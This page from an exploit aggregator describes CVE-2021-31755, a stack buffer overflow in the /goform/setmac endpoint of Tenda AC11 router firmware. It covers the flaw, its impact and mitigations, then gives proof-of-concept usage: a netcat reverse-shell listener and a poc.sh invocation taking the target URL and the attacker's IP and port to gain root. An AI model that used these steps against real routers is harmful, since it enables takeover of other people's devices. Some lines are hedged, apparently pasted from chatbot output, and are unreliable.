Exploit for Out-of-bounds Write in Tenda Ac11 Firmware CVE-2021-31755

Name: Exploit for Out-of-bounds Write in Tenda Ac11 Firmware CVE-2021-31755
Rating: 5 (201 reviews)
2024-10-24 | CVSS 8.7
## https://sploitus.com/exploit?id=5755C2CD-C62B-52BE-B4A2-11363176FB44
# CVE-2021-31755

The issue is a **stack buffer overflow vulnerability** discovered in **Tenda AC11 routers**, with firmware versions through **02.03.01.104_CN**. 
This type of vulnerability, if exploited, allows attackers to execute arbitrary code on the affected device. Here's a breakdown of this CVE based on the description:

## Vulnerability Overview
- **CVE Identifier:** CVE-2021-31755 (or a related vulnerability if you're referring to a Tenda-specific issue)
- **Vulnerability Type:** Stack Buffer Overflow
- **Affected Device:** Tenda AC11 Router
- **Firmware Affected:** Through version 02.03.01.104_CN
- **Attack Vector:** A **crafted POST request** to the `/goform/setmac` endpoint

## Description
This vulnerability exists due to improper handling of user input in the **/goform/setmac** endpoint of the Tenda AC11 firmware. 
Specifically, there is a stack buffer overflow, which occurs when an attacker sends an excessively large payload to this endpoint in a POST request. 
Since the application does not properly validate or limit the size of the input, it overwrites critical memory areas in the stack.

When this happens, an attacker can manipulate the memory in such a way that they gain control of the **instruction pointer**, 
which allows them to execute arbitrary code on the device. The impact of such code execution can range from complete takeover of the router, changing its settings, 
spying on traffic, or even launching further attacks on devices connected to the network.

## Exploit Details
- **Attack Method:** The attacker sends a specially crafted POST request to the vulnerable `/goform/setmac` endpoint.
- **Required Access:** The attacker would need network access to the router to exploit this vulnerability.
- **Potential Impact:** Code execution, system control, and further network compromise.

## Mitigation
To mitigate this vulnerability:
1. **Update Firmware:** Tenda has likely released a patch to address this vulnerability in a newer version of the firmware. Users should check for updates and install the latest firmware.
2. **Restrict Access:** If an update is not available or cannot be applied immediately, restrict access to the router’s management interface from untrusted networks.
3. **Use Network-Level Protections:** Employ firewalls and network segmentation to limit exposure of the vulnerable router to the broader internet.


# POC

Run reverse shell listener

```bash
nc -lvp local_port
```

Execute `poc.sh`:

```bash
bash poc.sh remote_url local_ip local_port
```

* _remote_url_ is vulnerable url
* _local_ip_ is an attacker machine IP 
* _local_port_ is an attacker machine port

If the exploit succeeds, root access should be granted.